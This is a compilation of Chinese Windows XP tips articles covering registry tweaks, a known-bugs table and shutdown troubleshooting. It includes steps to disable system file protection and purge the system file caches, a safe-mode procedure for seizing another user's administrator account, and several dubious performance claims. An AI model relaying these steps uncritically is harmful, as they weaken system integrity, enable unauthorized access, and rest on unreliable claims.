    如果你想让Windows XP瞬间关机，那么可以按下CTRL+ALT+DEL，接着在弹出的任务管理器中点击“关机”→“关机”，与此同时按住CTRL，不到1秒钟你会发现系统已经关闭啦，简直就在眨眼之间。同样道理，如果在“关机”菜单中选择“重启”，即可快速重启。

    12. 寻找丢失的快速启动栏

    把鼠标移到任务栏的空白区域，单击右键从弹出的菜单中选择“属性”，在弹出的窗口中选择“任务栏”选项卡，再从“任务栏外观”框中把“显示快速启动”的复选框选中，“确定”就行了。

    13. 批量文件重命名

    Windows XP提供了批量重命名文件的功能，在资源管理器中选择几个文件，接着按F2键，然后重命名这些文件中的一个，这样所有被选择的文件将会被重命名为新的文件名（在末尾处加上递增的数字）。

    14. 快速锁定计算机

    在桌面上单击鼠标右键，在随后出现的快捷菜单上选择新建“快捷方式”，接着系统便会启动创建快捷方式向导，在文本框中输“rundll32.exe user32.dll,LockWorkStation”，点击“下一步”，在弹出的窗口中输入快捷方式的名称，点击“完成”即可。当然最简单的锁定计算机的方法是直接按WinKey + L。

    15. 让双键鼠标具有滚页功能

    在控制面板中双击“鼠标”项，在弹出的“鼠标属性”对话框中选择“单击锁定” 栏中的“启动单击锁定”项。再点击“设置”按钮，在弹出的“单击锁定的设置”对话框中将鼠标设为最短，点击“确定”保存。打开一个网页，点击网页的卷轴，在离网页卷轴不远处上下移动鼠标，即可实现此功能。再次点击网页的卷轴即可关闭此功能。

    16. 让Windows XP读英文字母

    找到“辅助工具”组里的“讲述人”程序，点击“声音”按钮，进入“声音设置”界面进行一番设置然后保存即可。当你把鼠标指向带有英文字母的对话框、菜单以及按钮时，会听见一个男声读着英文字母。


Windows XP硬件优化全功略

《一键清理系统垃圾》

Windows XP硬件优化全功略

相信大家都想令自己的Windows XP启动速度更快，工作更稳定，那么如何做呢，下面我们
就来简单介绍一下如何从优化Windows XP。

--------------------------------------------------------------------------------

一、缩短启动时间

    推荐大家使用微软发布的Bootvis软件，它能够对系统进行自动优化，以缩短启动所用的
时间，在“Trace”中选择“Optimize System”然后重新启动即可；另外也可以通过Windows
XP内建的MsConfig设置程序减少启动时所加载的程序来缩短启动时间，只在运行中输入启动
“msconfig”再通过“Startup”进行相关设置即可。

1)、Bootvis

2)、msconfig

二、设置处理器二级缓存容量

    Windows XP无法自动检测处理器的二级缓存容量，需要我们自己在注册表中手动设置，首
先打开注册表(运行中输入“Regedit”)，再打开:

HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Control＼Session Manager＼Memory M
anagement＼

    选择“SecondLevelDataCache”，根据自己所用的处理器设置即可，例如PIII Coppermi
ne/P4 Willamette是“256”，Athlon XP是“384”，P4 Northwood是“512”。

三、安装UPnP安全补丁程序

    微软最新发布了针对Windows XP的UPnP安全补丁程序，该程序修正了WinXP中存在的安全
漏洞，大家可以通过下面的地址更新：
Windows XP Home & Pro UPnP Patch

四、关闭系统还原及休眠支持

    虽然这两项功能也并非完全没有任何作用，但考虑到需要需要占用很大的硬盘空间，所以
最好把它们关闭；首先鼠标右健单击桌面上的“我的电脑”，选择“属性”，找到“系统还原
(System Restore)”，在“Turn off System Restore on all drives”前打上勾就可以了。

休眠支持只需要通过控制面板 -> 电源选项 -> 休眠(Hibernate)，把“Enable Hibernate”
前面的勾去掉就可以了，这样一来可以空出512MB的硬盘空间。

五、释放QoS Packet所占用的20%网络带宽

    Windows XP内建的QoS Packet需要占用20%的网络带宽，还好我们可以通过“Group Poli
cy”来关闭，具体步骤如下: 在运行中输入“gpedit.msc”，启动该程序后，选择Computer
Configuration -> Administrative Templates -> Network -> QoS Packet Scheduler，选择
右边的“Limit reservable bandwidth”，设置为“Enabled”，再把“Bandwidth Limit”设
置为“0”。

六、禁止虚拟内存(页面交换文件)执行

    本方法最好在配备256MB以上内存(推荐384MB或512MB)的系统上使用，具体步骤为，启动
注册表编辑器，然后找到：

HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Control＼Session Manager＼Memory M
anagement＼

    选择“DisablePagingExecutive(禁止页面文件执行)”，设置为“1”，这样可以从一定
程度上改善内存的性能，提高系统的运行速度，毕竟内存比硬盘快得多。

七、删除Windows XP中不需要的组件

1)、删除系统文件备份，执行sfc.exe /purgecache

2)、删除驱动备份，删除WINDOWS(XP安装目录)＼driver cache＼i386目录下的Driver.cab文
件

3)、删除DLL备份文件，目录为WINDOWS(XP安装目录)＼system32＼dllcache,

4)、删除WINDOWS(XP安装目录)＼ime下不用的输入法

八、验证Windows XP是否已激活

    在运行中输入“oobe/msoobe /a”；版本号可以通过WINDOWS(XP安装目录)system32/NTO
SKRNL.EXE，鼠标右键 -> 选内容查看即可。

九、设置IRQ优先权

    从HKEY_LOCAL_MACHINE＼System＼CurrentControlSet＼Control＼PriorityControl，在
右边新建名为“IRQ#Priority”的DWORD键值，其中“#”为相关设备的IRQ号，例如“8”，然
后把键值设置为“1”即可；如果遇到IRQ问题，可以试试这个方法。

十、加快关机速度

    与启动一样，Windows XP的关机速度也是一样的慢，要加快关机速度，首先我们先要通过
注册表开启WinXP的自动结束任务功能(AutoEndTasks)，具体步骤为: 找到HKEY_CURRENT_USE
R＼Control Panel＼Desktop，把AutoEndTasks的键值设置为1即可。

    然后再修改“HungAppTimeout”为“4000(或更小)”(预设为50000)，该键值同样也在HK
EY_CURRENT_USER＼Control Panel＼Desktop目录下；最后一步再找到HKEY_LOCAL_MACHINE＼
System＼CurrentControlSet＼Control＼，同样把WaitToKillServiceTimeout设置为“4000”
；通过这样设置后的关机速度明显快了一些，

十一、完全关闭Windows XP文件保护功能

    从注册表中找到HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼Windows NT＼CurrentVer
sion＼Winlogon，修改“SFCDisable”键值为“FFFFFF9D”，如果需要重新启用该功能，重新
设置为“0”就可以了。

十二、启动硬盘/光驱DMA模式

    打开系统属性 -> Hardware(硬件) -> Device Manager(设备管理器) -> IDE ATA/ATAPI
controllers，选择“Primary IDE Channel”或“Secondary IDE Channel”，检查DMA模式
是否已启动，一般来说如果设备支持，系统就会自动打开DMA功能；另外驱动器现在所用的传
输模式也可以在这里看到。

十三、禁用Dr. Watson调试程序

    在运行中输入“drwtsn32”，然后把除了“(Dump All Thread Contexts)转储全部线程上
下文”之外的全都去掉，否则一旦有程序出错，硬盘会响很久，而且会占用很多硬盘空间。


Windows XP优化指南

《一键清理系统垃圾》

Windows XP优化指南

    动手前的准备

    动手之前，首先要确保以管理员的身份登录操作系统，因为普通用户身份下好些选项是无权使用的。接下来请激活清晰字体（ClearType），ClearType能使桌面的文字看起来更加清晰易读——这对于手提电脑或液晶显示器用户尤其重要，请看下面关闭和打开ClearType（清晰字体）的前后效果对比图：

关闭清晰字体ClearType

打开清晰字体Cleartype

    要激活ClearType，请打开控制面板的显示属性，点击“Appearances（外观）”选项卡，然后点击“Effects...（...效果）”按钮，就会弹出如下对话框（由于笔者用的是英文版，涉及到Windows界面的东东，下面均采用前面这样写出英文并括号中注明中文意思的方式）：

    勾上“Use the following method to smooth edges of screen fonts...（用下列方法圆滑屏幕字体边缘）”并在下拉菜单中选择“ClearType（清晰字体）”，然后点击OK（确定），Apply（应用）按钮。

    效果好多了吧？下面我们看看其它的优化！

    好哩……先来看看一些基本的优化。其中有些是Windows 95/98/ME等以前版本上都有的优化设置，在XP中同样有效，所有这些优化设置都是在在Windows XP Professional版中测试的——它们多半在XP 家庭版中同样有效，有些优化在家庭版中改了个名而已。
优化一——MsConfig

    大多数朋友都应该熟识MsConfig了，这是一个系统内置的Windows设置工具。点击开始菜单，选择“运行”，然后在录入框中敲入“msconfig”回车。我们要动手脚的是“Startup（启动）”选项卡，点击它，就可以看到这个界面：

    这个选项卡中显示了Windows启动时运行的所有程序。这里没有一个程序对Windows来说是生死悠关的，所以放心大胆地把不要的去掉。图中可以看到，笔者把NDetect（ICQ的启动程序）和WinAmpa（就是MP3播放器Winamp了）。把部分勾勾去掉之后，Windows启动会快些，同时空闲的系统资源也会多出一些。

    优化二——其它启动优化

    做完前面的优化，让我们进一步深入其它启动项。再次点击开始——>运行，在录入框中敲入“services.msc”，回车后弹出如下窗口：

    这是Windows启动过程的更详细列表，凡是在名字右边标着“Automatic（自动）”的项目都是Windows启动时运行的软件。鼠标单击选中其中一条，就会显示出一些文字，说明它有什么作用。中果决定不需要某种服务，只要右键点击它，把属性中的“Automatic（自动）”改为“Manual（手动）”就得了。

优化三——IE网络浏览器加速技巧

    Windows XP自带Internet Explorer 6，有个小技巧，修改之后启动得飞快（在我的机子上，简直是瞬间启动）。有些朋友试过为“半条命”游戏建个快捷方式，用一定方法修改之后启动加快，这里也是同样原理。右键点击Internet Explorer快捷图标（如任务栏上的快捷启动栏中那个IE图标），打开图标属性之后在“Target（目标）”后面加上“-nohome”参数，如下图：

    优化四——菜单延迟

    另一个简单的优化小把戏，就是把滑出菜单时的延迟去掉。修改这个，要用到注册表编辑器（点击开始——>运行，然后敲入“regedit”回车）。要修改的键值在 HKEY_CURRENT_USER\Control Panel\Desktop。具体要修改的键名是MenuShowDelay——只需把值改为0就得了。记住，要重新启动计算机后更改才生效。

优化五——GPEDIT和Autoplay

    Windows XP自带了一个非常好用的优化文件，它就是gpedit.msc。开始——>运行，敲入“gpedit.msc”并回车。这是一个非常有效的编辑工具，可以非常方便地修改一些常见的设置。譬如，你不喜欢CD自动播放的话，用这个工具修改再简便不过了，运行gpedit.msc之后，依次点击Computer Configuration（计算机设置）——>Administrative Templates （管理模板）——>System（系统），这里可以看到一个“Turn off Autoplay（关闭自动运行）”值，右键点击它选择“属性”：

    这里还有很多其它的设置，自己慢慢玩，看有什么值得优化的吧。

    优化六——寻找“添加/删除”菜单中隐藏了的选项

    不喜欢MSN Messenger吗，或是想把Windows Media Player媒体播放器给删掉？可惜打开控制面板中的“添加/删除程序”，Windows XP自带的程序都不在里面。其实很容易找到，只需用记事本打开Windows\inf\sysoc.inf文件，找到类似下面这一段：
[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

    这是当前所有已安装部件列表，继续前面MSN Messenger的例子，这个程序条目名是“msmsgs”，在倒数第三行。可以看到被我标为红色的“hide”字样，就是这个参数在控制Windows“添加/删除程序”中不显示这一项。只需把“hide”删掉就得了，如下：

    msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

    改为：

    msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

    现在重新启动计算机，就可以在“添加/删除程序”列表里看到MSN Messenger了。如果想要在添加/删除程序里看到所有的已安装组件，只需用记事本打开sysoc.inf文件，用记事本的查找/替换功能把所有“,hide”替换为“,”就行了。

    优化七——关闭Windows的文件保护

    警告：这样修改之后可以直接删除Windows的关键文件。

    默认状态下系统禁止用户删除系统和程序文件，经过修改注册表可以彻底解除这个限制。打开注册表找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon 中的SFCDisable，把它的值改为0xFFFFFF9D，如下图：

    如果要用文件保护，重新把它值改为0就行了。

优化八——关闭计算机时自动结束任务

    在关机的时候，有时会弹出讨厌的对话框，提醒某个程序仍在运行，是否结束任务。其实完全可以通过一点点修改让Windows自动结束这些仍在运行的程序。在注册表中打开HKEY_CURRENT_USER\Control Panel\Desktop 目录，把里面的AugoEndTasks键值改为1：

    注：可能会找不到AutoEndTasks键值，如果是这样的话，自己建一个串值并把它改为这个名字，值设为1就可以了。

    优化九——内存性能优化

    Windows XP中有几个选项可以优化内存性能，它们全都在注册表下面位置：

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Session Manager\Memory Management

    禁用内存页面调度（Paging Executive）

    在正常情况下，XP会把内存中的片断写入硬盘，我们可以阻止它这样做，让数据保留在内存中，从而提升系统性能。要注意的是，拥有很多内存的用户（256M以上）才好使用这个设置。这个设置的名字正如它的功能一样，叫“DisablePagingExecutive”。把它的值从0改为1就可以禁止内存页面调度了。

    提升系统缓存

    把LargeSystemCache键值从0改为1，Windows XP就会把除了4M之外的系统内存全部分配到文件系统缓存中，这意味着XP的内核能够在内存中运行，大大提高系统速度。剩下的4M内存是用来做磁盘缓存的，在一定条件下需要的时候，XP还会分配更多一些。一般来说，这项优化会使系统性能得到相当的提升，但也有可能会使某些应用程序性能降低。正如前面所说的，必须有256M以上的内存，才好激活LargeSystemCache，否则不要动它。

输入/输出性能

    这个优化只对server用户才有实在意义——它能够提升系统进行大容量文件传输时的性能。在默认情况下，这个键值在注册表中是不存在的，必须自己建一个DWORD（双字节值）键值，命名为IOPageLockLimit。多数人在使用这项优化时都发现8到16M字节之间性能最好，具体设什么值，可以设进去试试看哪个值可以获得最佳性能。记住这个值是用字节来计算的，因此，譬如你要分配12M的话，就是12 * 1024 * 1024，也就是12582912。跟前面的内存优化一样，只有当你的内存大于256M的时候才好更改这里的值。

    优化十——加速共享查看

    这是一项很棒的优化，在找到这项优化之前，我经常在漫长地等待窗口显示其它机子上的共享目录中敲破头皮。通常情况下，当Windows XP连接到其它计算机时，会检查对方机子上所有预定的任务——这真是多余，而且还会让你等上30秒钟，实在太糟糕了。所幸的是，很容易就可以把这个过程给禁掉。首先，在注册表中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows/Current
Version\Explorer\RemoteComputer\NameSpace。在这里面，应该有个
{D6277990-4C6A-11CF-8D87-00AA0060F5BF}键。只需把它删掉，重新启动计算机后，Windows就不再检查预定任务了，速度明显提高！

    优化十一——手动指定进程次序

    同时按下Control+Alt+Delete三个键，然后点击“Processes（进程）”选项卡，可以看到一个如上图所示的对话框，在这里可以看到目前正在运行的所有进程。如果要为一个程序分配更多的进程时间，如3D Studio Max，只需右键点击这个进程，再把鼠标指针向下移动到“Set Priority>（设置优先级）”，然后选择你想要这个程序处在哪个优先级。当我接收email时，我会把3DMAX设为“标准”，但当我离开计算机的时候，我会把它的优先急提升为最高的“实时”，这样可以计算机更专注更快速地处理3D动作。

优化十二——为IRQ中断请求排优先次序

    这是本优化指南的最后一项优化，也是一项非常有效的优化。计算机的每一个主要部件都设了个IRQ中断号。这里就是要通过修改每个IRQ请求的优先次序达到优化目的。这里主要的优化对象是系统/CMOS实时钟，它通过主板来提升性能。首先，要确定你想要哪个组件获得更高的性能，然后找到这个硬件正在使用的IRQ中断号。怎么找呢？打开控制面板里的系统属性（也可以按键盘上的Windows+Break热键组合打开它）。选中“硬件”选项卡，然后点击“设备管理器”按钮。

    右键点击要查IRQ号的组件，选择“属性”，然后点击“资源”选项卡。

这里可以看到设备正在使用的IRQ中断号（如果没有IRQ中断号，选择另一个设备）。把中断号记下来，然后运行注册表编辑器regedit，找到注册表中的HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\
PriorityControl 位置。我们要在这里建立一个名为IRQ#Priority（其中“#”是具体的IRQ中断号）的DWORD双字节值，然后把它的值设为1。譬如说，我的系统CMOS实时钟的IRQ中断号是8，我要建立的键名就是IRQ8Priority。

    重新启动计算机之后，就会发现刚优化过的组件性能有所提高。笔者强烈建议用这个方法优化系统CMOS实时钟，因为它能改善整块主板的性能。当然也可以把多个IRQ中断号优先级提高，但这样做的效果没那么好，而且有可能造成系统不稳定。要把这个优化设置撤消的话，只要把刚才建立的注册表键值删掉就OK了。

    结语

    Windows XP优化指南就写这么多，希望无论在外观还是性能上都能为你带来一些好处。（至于外观方面写得较少，因为笔者将会着手写一篇Windows XP整形手术）祝各位玩得开心！


Windows XP真正的超级管理员

《一键清理系统垃圾》

Windows XP真正的超级管理员

    Windows XP凭借极高的安全性和稳定性，赢得了广大用户的青睐。我们可以通过建立个人账户、设定密码来保护自己的个人隐私，还可以用Administrators(超级管理员)的身份任意设置账户，为每一个账户设置不同的权限，可以说拥有至高无上的权利，也拥有系统的“生杀大权”，享有系统最高级别的安全保障。

    但是，如果我告诉你，我能不费吹灰之力就可以将你这个Administrators给废掉，
取而代之的是我成为Administrators，你信不信？呵呵，你不信？好，我们来试一试：

      步骤一 重新启动计算机，在出现启动菜单时按F8键进入高级选项菜单，选择“安全模式”进入系统；

      步骤二 打开“控制面板”，找到“用户和密码”选项，看看是不是账户中包括Administrators？好，现在将Administrators账户删除，重新创建一个Administrators，或是更改原来的Administrators账户密码；

      步骤三 重新启动计算机后，只有输入新的密码才能登录Windows XP。

    为什么会出现这种问题呢？原因很简单：Windows XP真正的超级管理员账号应该是在安全模式下的Administrators，并不是在正常模式下的Administrators。在默认情况下，安全模式下的Administrators密码为空。无论用户在正常模式下将Administrators密码设置得多么复杂，安全性多么高，如果没有设置安全模式下的Administrators密码，你的电脑将毫无秘密可言。

    现在，你是不是对Windows XP的安全性有些担忧了？那怎么办？这还不简单：赶紧进入安全模式，设置Administrators密码，将自己提升为真正的Administrators！当然，这次设置的密码要记牢了，否则下次你就真的无法进入Windows XP了！


Windows XP中搜索隐藏文件的两种方法

《一键清理系统垃圾》

Windows XP中搜索隐藏文件的两种方法

    1.直接设置

    首先打开“资源管理器”，点击工具栏上的“搜索”按钮，在左边的“搜索助理”栏中点击“改变首选项”，系统会问你：“你想怎样使用搜索助理？”，点击中间的“改变文件和文件夹搜索行为”，然后选择“默认的文件和文件夹搜索行为”为“高级”确定即可看到“更多高级选项”这一项，点击后会弹出很多高级选项，好了，还犹豫什么，赶快勾选“ 搜索隐藏的文件和文件夹”吧，如果还需要其他的选项(如“区分大小写”)也可以一并选中。

    2.修改注册表法

    如果你觉得上面的设置过于麻烦，也可以通过修改注册表的办法来达到。打开“注册表编辑器”并定位到“HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Explorer”分支，在右边的窗口中找到DWORD值“SearchHidden”并将其值设为“1”即可。


Windows XP中鲜为人知的热键漏洞

《一键清理系统垃圾》

Windows XP中鲜为人知的热键漏洞

  预备知识：两个概念

    1、热键

    热键是用来启动一个程序或者使用一个程序的某项功能的一个键和一组键，一个键的可以包括F1，F2这些功能键，也可以是一些特制的键，比如DELL键盘上的“internet”，“
mail”等一般键盘上没有的键，最常见的主要是一些组合键，使用QQ的人最熟悉的热键是“ctrl＋~”组合键，用来打开快捷地查看发来的信息。还有许多热键可以用来打开程序，这些热键一般自己可以设置，设置后可以用来打开各种程序，你可以为每个程序的设置确定规则，这样就可以有效地利用热键地功能，比如按照程序的首字母来命名，这样经过设置后，你就可以方便地用“ctrl＋Alt＋N”打开记事本，用“ctrl＋Alt＋W”打开word，对于那些对某个工具特别依赖的人来说，这样的打开程序的方式是很方便的，因此被广泛使用。

    2、winxp的“自注销”功能

    在办公的时候，我们常常需要暂时离开一下，而把电脑晾在办公桌上，这样就意味着信息被窥或丢失甚至更严重的后果，所以有了屏幕保护程序，如果你设了密码，那么一般情况下，别人就动不了你的电脑。这样就保证了安全。

    在winxp中，它提供一种我们称之为“自注销”(即自动注销)的功能，这种功能与屏幕保护程序有着异曲同工之妙，在你的电脑有一段时间出于静止状态后它就自动注销，不过这种“注销”是一种假注销，你所有的后台程序都还在运行，跟没有注销前几乎没有什么差别，这就留下了隐患。

    漏洞描述

    热键功能是系统提供的一个服务(专指打开程序，使用程序的热键)，在启动过程一直到登陆界面，这个服务一直没有执行，当你以某一用户的身份登陆时，这个功能方才启动，执行之后，用户就可以使用用户自己设置(包括一些默认的热键)的热键了。

    假设一用户(他有管理员的身分，并以管理员登陆)有事离开一段时间，本来以为马上就回来，但后来被事情逼得不能马上就回来了，他的电脑就暴露在没有保护的情况下了，这时winxp(这里提到的电脑的操作系统都专指winxp，而且该操作系统并没有设置屏幕保护程序和相应的密码)就非常聪明地自动实施了“自注销”。如果这种注销是真的注销了，那么这种安全措施显然是非常好的，但正如前面所讲，这种注销是假的，虽然其他人已经进不了你的桌面，看不到你的电脑里放了些什么，但他们还可以使用热键，因为热键服务还没有停止。

    这时一个有敌意的并且经验丰富的人就可以利用这些热键干一些事，最简单比如打开N个大程序，来破坏你的机器，可以打开并使用某个程序，特别是一些与网络有关的敏感程序(和服务)……

    实际上这台电脑被他控制了一半，只要他有足够的想象力……

    安全对策

    其实，我们得承认上面这个漏洞要被利用真正做出有破坏性的事情来几率是十分小的，它成立需要许许多多的“假设”，但作为一个漏洞，它却是实实在在存在的，不怕一万，只怕万一，就象“CDautorun”，据我们所知，它还没有被真正用来搞过破坏，但是这种破坏安全的可能性是实实在在存在的，所以在许多公共场合(比如网吧)，这项功能是关闭的。


Windows XP主要问题以及解决方法一览

《一键清理系统垃圾》

Windows XP主要问题以及解决方法一览

2002-02-23　　　　作者：

    在Windows XP操作系统下，Windows messenger的语音聊天功能无法联接，而一些其它即时语音聊天软件则没有此类问题，如Yahoo Messenger甚至更早的MSNMessenger。还有用户无法保存对Windows XP资源管理器窗口浏览模式的设置，导致用户每次打开资源管理器时都不得不重新进行设置。工具条提示栏中的提示信息无法突出显示。有用户报导甚至Windows升级程序本身也存在问题，有时用户已经升级了某个补丁，而升级程序却不能记忆。

    此外Windows XP在关机过程中有时也会出现死机现象，而且与以往版本相同的是Windows XP仍然没有完全解决蓝屏死机的问题，当用户运行一些与系统不兼容的驱动程序或应用程序时，操作系统就有可能自动重新启动。使用Outlook Express的用户在系统从老Windows操作系统升级至Windows XP系统时会发现他们的收件箱未能成功升级。虽然原有收件箱的内容仍然保留在硬盘上，但用户只能手功将信息转移至当前保存位置，或者对OutlookExpress进行重新设置，搜索保存在硬盘上的原有信息。

Windows XP主要问题详见下表： 程序 问题 修补
光盘刻录 使用Windows XP系统刻录的光盘在Windows95/98系统操作环境或是在MP3播放器上无法读取或丢失部分文件或文件夹。 可升级补丁
电源管理 不支持Pentium III和Athlon的CPU电源管理功能，导致使用这两种类型CPU的笔记本电脑能耗消耗较大。 可升级补丁，详情请见相关链接：

PentiumIII

Athlon

关机 系统关机过程中有时在屏幕显示"Saving your Settings"（保存设置）的信息时会出现死机现象。 可从Windows升级产品目录中获得升级补丁。从StartàAll ProgramsàWindows Update中选择PersonalizeWindows Update，点击Display the Link。
AOL 6.X 某些版本与Windows XP不兼容 升级至AOL 7.0或升级至可兼容的AOL 6.X版本
Ghost 2001 与Windows XP不兼容 升级至Ghost 2002
McAfee VirusScan杀毒软件 与Windows XP不兼容 对于版本号在4.5至5.21之间的该套软件，从Windows升级库中下载兼容补丁包。版本号更早的程序必须要升级至6.0X
Outlook Express 当老版本的Windows操作系统升级至Windows XP后，文件及设置转移向导程序可能丢失统计数据或原有统计数据被新数据覆盖。如果在Windows9X/Me系统上运行Windows XP的Outlook Express程序，信息存储功能可能失效。 可升级补丁
PowerQuest Drive Image 与Windows XP不兼容 升级至PowerQuest Drive Image 5.0版本
PowerQuest PartitionMagic 与Windows XP不兼容 升级至PowerQuest PartitionMagic 7.0版本
QuickTime 5 程序无法自动播放内嵌在网页中的关联电影文件 从Apple网站下载IE 6兼容插件。
远程协助 当系统需要的协助超过一个网络连接（如有一个网络适配器和一个调制解调器）且使用个人防火墙时，远程协助可能失效。 升级补丁
Roxio Easy CD Creator 与Windows XP不兼容 对于5.0白金版的用户，从Roxio网站下载免费升级至5.1版本的升级程序。对于5.0标准版的用户，下载有90天试用期的5.1白金版升级程序，等待5.1标准版用户升级程序的提供。对于4.02版本的用户，下载Windows升级程序（该升级补丁的兼容性尚未得到软件生产商的确认。）
Symantec Norton AntiVirus 2001 与Windows XP不兼容 从Windows升级网站上下载兼容补丁（该升级补丁的兼容性尚未得到软件生产商的确认。）也可升级至Norton AntiVirus2002版。
Symantec WinFax Pro 10 与Windows XP不兼容 升级至WinFax Pro 10.02版。
Windows Messenger 音频视频聊天模块与Internet Connection Sharing或ICS防火墙不兼容。 无升级补丁
Windows Messenger 音频有时出现爆破声和回音 可从Windows升级库中升级补丁。
ZoneAlarm Pro 某些版本阻止所有网络联接或导致计算机突然重新启动。 点击设置按钮，选择升级功能，升级至2.6.357版本或其后的版本。


Windows XP最新两条BUG曝光

《一键清理系统垃圾》

Windows XP最新两条BUG曝光

    Windows XP自发布以来就不断地公布安全补丁，其实它在其他方面也有很多“虫虫”，这次为大家揪出的两条“虫虫”，算是比较有“杀伤力”的。希望遇到其他“虫虫”的朋友也把自己的遭遇发给晨风，大家一起来抓“虫虫”！

    共享文件夹名超长不警告

    一天，在Windows XP中文专业版中设置共享文件夹时，我发现了一个“虫虫”——Windows XP不能准确发出共享文件夹名超长的警告!

    假设我们选定一个文件夹设置简单共享：用鼠标右键单击该文件夹，选择“共享和安全→共享”，选中“共享该文件夹”，接下来在“共享名”后面输入共享文件夹的名称，如果名称超过12个汉字或12个英文字母，系统就会给出如图1所示的提示。但如果我们将共享文件夹名设为7~12个汉字，系统并不会给出共享文件夹名超长的警告！但局域网中安装Windows 98/Me/NT的计算机却无法浏览到这个共享文件夹！

图1

    事实上，在Windows 98/Me/NT中，共享文件夹名可设置的范围就是12个英文字符或6个汉字，超出部分将无法输入。但Windows XP却将“字符”理解为一个字母或一个汉字即表示一个字符，这可以在设置英文和汉字组成的混合共享文件夹名时得到验证：比如我们将共享文件夹名设为“Windows操作技巧大全”，Windows XP提示共享文件夹名超过12个字符，但设置成“Windows操作技巧集”时，则没有这个提示。这应当算是Windows XP的一个“虫虫”。

    其实，Windows 2000中文版在设置共享文件夹名时也有这种问题：Windows 2000支持的最大共享文件夹名长度为80个英文字母或40个汉字，但设置共享文件夹名时可输入的范围是80个英文字符或80个汉字，如果共享文件夹名在41~80个汉字之间，系统会提示“该共享名包含无效的字符”(如图2)，其实真正的原因是共享文件夹名超长。

图2

    缩略图显示有陷阱

    近日，学校要办新的学生证，学生的照片都是先用数码相机拍摄，再用打印机打印。因为我们对大部分学生都不认识，所以需要班主任老师对这些照片一一辨认，看一看学生本人的学号与照片的文件名是否一致。在查看时，有一张名字为“25501”的照片，因为有问题我将它删除了，将“25502”改成了“25501”，看，“25502”的照片立刻换成了“25501”的照片，不只是名字换了，照片也变了。我再将“25503”换成“25502”，奇迹发生了，原来的“25502”照片又回来了，“25503”的照片不见了！我再试，依然如此！

    难道我的电脑中招了？只好请教电脑高手了，高手就是高手，他告诉我：Windows XP为了能更快地显示图片，会自动将文件夹中的图片缩略图保存为索引文件“Thumbs.db”。我们将没用的图片删除后，由于“Thumbs.db”不能立即自动更新，当出现新文件与原文件名称相同时，便直接将原缩略图取了出来，其实图片本身并没变，改变的只是图片的缩略图。但这样就对用户造成了误导！

    解决方法是：打开资源管理器，选择“工具→文件夹选项→查看”，选中“不缓存缩略图”选项前的复选框，即可禁止Windows XP使用Thumbs.db文件缓存缩略图。


WindowsXP不能正常关机的解决之道

《一键清理系统垃圾》

WindowsXP不能正常关机的解决之道

2002-02-25　　　作者：·柳随风

    朋友陆很会紧跟潮流，中文版windowsXP发布还没有几天，他已经将XP装到硬盘里去了。安装也还顺利，不过却无法正常关机。出了这种情况，当然该我出手了。

    朋友的电脑配置是：K6-2 266MHz @300MHz ，MVP3（AT板型）主板，160 MB SDRAM（PC100)，FUJITSU 10G硬盘，CMI-8330 ISA接口声卡，显卡是SIS6326，AT电源。

    过去一看，原来执行关机操作后，并不是显示“现在可以安全的关机了”（如果是ATX主板加ATX电源，当然是自动关机），而是重新启动，只能手动强制关机。

    其实关机不正常的情况在windows98SE是非常多见的一个情况。常见的原因有：

1.操作系统及主板对ACPI或APM支持不够完善。
2.主板之外的各种硬件对ACPI或APM支持不够完善。
3.硬件驱动程序的BUG。
4.主板的BIOS需要改进。
5.系统对快速关机支持不够好（仅对windows98而言)。
6 关机前有一些常驻内存的程序示退出并与系统的关机进程有冲突。
7 病毒。
8 磁盘子系统的故障，如IDE驱动程序与系统兼容性不够好。

    当然还有许多其它方面的原因，笔者不可能在此一一赘述。
因为朋友是新安装的操作系统，除了声卡的驱动外（其它硬件因操作系统自带驱动），尚未安装各种应用程序。所以笔者将问题的重点放在主板及操作系统对电源管理的支持不够完善上。秉着先易后难的原则，首先进入主板的CMOS设置界面，在power management里将PM control by APM关闭,启动进入系统后，再关机，电脑仍然重启。

    再启动windowsXP，依次进入控制面板\电源管理，点击“休眠”选单，此时启用休眠处于未选中状态，遂勾选“启用休眠”，可仍未能见效。

    重新进入控制面板里的电源选项，点击“高级电源管理”子页，系统显示:本机支持高级电源管理（APM），使用APM可降低系统的电源损耗。而此时“启用高级电源管理支持”处于选中态。毫不犹豫地去掉“启用高级电源管理支持”，多耗点电都也罢了，不能正常关机，多别扭啊。接下来当然是关机，OK，“现在可以安全的关机”几个字样出来了，哈哈，蛮亲切的嘛。

    本例是由于本系统对高级电源管理支持不够好所致，或可通过升级BIOS消除故障，只是此主板已是年代久远，可能已找不着更新的BIOS了，所以未曾尝试，对ATX主板，建议仍然启用高级电源管理，否则亦会有可能出现麻烦呢。


WindowsXP使用问题解答(一)(原创)

《一键清理系统垃圾》

WindowsXP使用问题解答(一)(原创)

2002-03-07　　　　作者：Xiaok

